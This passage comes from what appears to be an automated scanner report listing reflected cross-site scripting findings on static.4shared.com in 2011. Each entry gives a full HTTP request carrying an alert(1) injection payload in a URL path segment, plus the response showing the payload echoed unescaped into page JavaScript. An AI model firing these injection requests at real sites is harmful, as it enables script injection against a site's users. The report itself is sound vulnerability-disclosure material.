User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles382a0'-alert(1)-'5b12fc25676/css/gzip_630963420/css/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2A5350B8B374BA74BF141BA2F0C5CA5D.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:49 GMT
Content-Length: 36319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
peof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/bundles382a0'-alert(1)-'5b12fc25676/css/gzip_630963420/css/openid.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLog
...[SNIP]...

1.39. http://static.4shared.com/bundles/css/gzip_630963420/css/openid.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/gzip_630963420/css/openid.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 163b1"-alert(1)-"297eae2c019 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles163b1"-alert(1)-"297eae2c019/css/gzip_630963420/css/openid.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles163b1"-alert(1)-"297eae2c019/css/gzip_630963420/css/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CFEBAD46D8406FDC60AABD88429B07B6.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:48 GMT
Content-Length: 36319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles163b1"-alert(1)-"297eae2c019/css/gzip_630963420/css/openid.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
fu
...[SNIP]...

1.40. http://static.4shared.com/bundles/css/gzip_630963420/css/openid.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/gzip_630963420/css/openid.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30f3d"-alert(1)-"0dd0c41e0d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles/css30f3d"-alert(1)-"0dd0c41e0d3/gzip_630963420/css/openid.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles/css30f3d"-alert(1)-"0dd0c41e0d3/gzip_630963420/css/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2891AA2AF3FD3761E519E71601B78FFD.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:54 GMT
Content-Length: 36319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css30f3d"-alert(1)-"0dd0c41e0d3/gzip_630963420/css/openid.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
functi
...[SNIP]...

1.41. http://static.4shared.com/bundles/css/gzip_630963420/css/openid.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/gzip_630963420/css/openid.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44bdc'-alert(1)-'6e400ba5416 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles/css44bdc'-alert(1)-'6e400ba5416/gzip_630963420/css/openid.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles/css44bdc'-alert(1)-'6e400ba5416/gzip_630963420/css/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=760EAF44A6835B6F3DAB9F804A4DDF49.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:55 GMT
Content-Length: 36308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/bundles/css44bdc'-alert(1)-'6e400ba5416/gzip_630963420/css/openid.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBo
...[SNIP]...

1.42. http://static.4shared.com/bundles/css/gzip_677814427/css/upload-frame.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/gzip_677814427/css/upload-frame.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec972'-alert(1)-'6684c6c6f4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundlesec972'-alert(1)-'6684c6c6f4a/css/gzip_677814427/css/upload-frame.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundlesec972'-alert(1)-'6684c6c6f4a/css/gzip_677814427/css/upload-frame.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9D121AF2E557642216C50DA90C741E67.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:49 GMT
Content-Length: 36349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
peof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/bundlesec972'-alert(1)-'6684c6c6f4a/css/gzip_677814427/css/upload-frame.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
s
...[SNIP]...

1.43. http://static.4shared.com/bundles/css/gzip_677814427/css/upload-frame.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/gzip_677814427/css/upload-frame.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b65f"-alert(1)-"5a3a52c1156 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles9b65f"-alert(1)-"5a3a52c1156/css/gzip_677814427/css/upload-frame.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles9b65f"-alert(1)-"5a3a52c1156/css/gzip_677814427/css/upload-frame.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F821921AEC084A71599799BE7EB3C302.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:48 GMT
Content-Length: 36349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles9b65f"-alert(1)-"5a3a52c1156/css/gzip_677814427/css/upload-frame.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

1.44. http://static.4shared.com/bundles/css/gzip_677814427/css/upload-frame.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/gzip_677814427/css/upload-frame.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b9ab"-alert(1)-"dee60659f4a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles/css3b9ab"-alert(1)-"dee60659f4a/gzip_677814427/css/upload-frame.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles/css3b9ab"-alert(1)-"dee60659f4a/gzip_677814427/css/upload-frame.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2401037377E5C602B65A37F6FB87A0F2.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:54 GMT
Content-Length: 36349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css3b9ab"-alert(1)-"dee60659f4a/gzip_677814427/css/upload-frame.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

1.45. http://static.4shared.com/bundles/css/gzip_677814427/css/upload-frame.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/gzip_677814427/css/upload-frame.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e804b'-alert(1)-'9e3861b94ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles/csse804b'-alert(1)-'9e3861b94ba/gzip_677814427/css/upload-frame.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles/csse804b'-alert(1)-'9e3861b94ba/gzip_677814427/css/upload-frame.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5F1C5489D51C30A757C17291BAC47888.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:55 GMT
Content-Length: 36349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/bundles/csse804b'-alert(1)-'9e3861b94ba/gzip_677814427/css/upload-frame.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showL
...[SNIP]...

1.46. http://static.4shared.com/bundles/css/gzip_N90201876/css/ajax-suggestions.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/gzip_N90201876/css/ajax-suggestions.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76573"-alert(1)-"ec03b530299 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles76573"-alert(1)-"ec03b530299/css/gzip_N90201876/css/ajax-suggestions.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles76573"-alert(1)-"ec03b530299/css/gzip_N90201876/css/ajax-suggestions.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9A9839C8DEFBDA68BADCFD7665FEA8D0.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:52 GMT
Content-Length: 36369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles76573"-alert(1)-"ec03b530299/css/gzip_N90201876/css/ajax-suggestions.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();

...[SNIP]...

1.47. http://static.4shared.com/bundles/css/gzip_N90201876/css/ajax-suggestions.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/gzip_N90201876/css/ajax-suggestions.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dc23'-alert(1)-'72a92ba4ffd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles5dc23'-alert(1)-'72a92ba4ffd/css/gzip_N90201876/css/ajax-suggestions.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles5dc23'-alert(1)-'72a92ba4ffd/css/gzip_N90201876/css/ajax-suggestions.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0F8F32A6B4B54955842841B4140EC378.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:53 GMT
Content-Length: 36369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
peof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/bundles5dc23'-alert(1)-'72a92ba4ffd/css/gzip_N90201876/css/ajax-suggestions.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{

...[SNIP]...

1.48. http://static.4shared.com/bundles/css/gzip_N90201876/css/ajax-suggestions.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/gzip_N90201876/css/ajax-suggestions.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e355f"-alert(1)-"c59a7821a20 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles/csse355f"-alert(1)-"c59a7821a20/gzip_N90201876/css/ajax-suggestions.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles/csse355f"-alert(1)-"c59a7821a20/gzip_N90201876/css/ajax-suggestions.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7B5D4E113620780EF4F857D96ACFA259.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:57 GMT
Content-Length: 36358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/csse355f"-alert(1)-"c59a7821a20/gzip_N90201876/css/ajax-suggestions.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

1.49. http://static.4shared.com/bundles/css/gzip_N90201876/css/ajax-suggestions.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/gzip_N90201876/css/ajax-suggestions.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58114'-alert(1)-'76a510a0ef2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles/css58114'-alert(1)-'76a510a0ef2/gzip_N90201876/css/ajax-suggestions.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles/css58114'-alert(1)-'76a510a0ef2/gzip_N90201876/css/ajax-suggestions.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=555AE896288B10DCBB510AEF3EC8EC50.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:59 GMT
Content-Length: 36369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/bundles/css58114'-alert(1)-'76a510a0ef2/gzip_N90201876/css/ajax-suggestions.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
s
...[SNIP]...

1.50. http://static.4shared.com/bundles/js/1258691160/bundles/js/global.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/js/1258691160/bundles/js/global.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b7ed'-alert(1)-'4e88300303c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles9b7ed'-alert(1)-'4e88300303c/js/1258691160/bundles/js/global.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles9b7ed'-alert(1)-'4e88300303c/js/1258691160/bundles/js/global.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7F48D75DE80D346CB4B260A3CEBFA59C.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:32 GMT
Content-Length: 36305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
peof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/bundles9b7ed'-alert(1)-'4e88300303c/js/1258691160/bundles/js/global.js',
remember : false

},
